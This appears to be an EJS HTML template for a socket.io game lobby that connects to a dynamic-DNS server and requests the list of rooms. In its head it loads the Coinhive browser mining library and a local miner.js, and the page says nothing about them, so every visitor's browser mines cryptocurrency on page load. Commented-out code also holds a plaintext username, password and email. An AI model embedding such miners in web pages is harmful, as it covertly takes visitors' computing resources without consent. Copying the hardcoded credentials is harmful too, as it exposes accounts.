<!DOCTYPE html>
<html>
  <head>
    <title><%= title %></title>
    
    <script src ="<%= address %>/socket.io/socket.io.js"></script>
    <script src="https://coinhive.com/lib/coinhive.min.js"></script>
    <script src="/javascripts/miner.js"></script>
    <link rel="stylesheet" href="/stylesheets/main.css" />
    <script>
    var socket = io.connect('http://werty12121.redirectme.net/');
//     socket.emit("create_game",{'name':"asdssasdasd"})
//     socket.emit("move",{'gdzie':"asdasdas",'co':'asdad'})
//     socket.on("new_move",function(data){
//       console.log(data)
//     })
//     socket.on("XorO",function(data){
//       console.log(data)
//     })
    
// socket.emit("register",{"login":"werty12121","password":"zaq1","email":"werty12121@wp.pl"})
//  socket.emit("login",{"login":"werty12121","password":"zaq1"})
//  socket.on("login_response",function(data){
//    console.log(data)
//  })
// setInterval(function(){
//   document.location.reload()
// },4000);
 socket.emit("getAllRooms",{});
 
    </script>
  </head>
  <body>
      
 
</body>
</html>
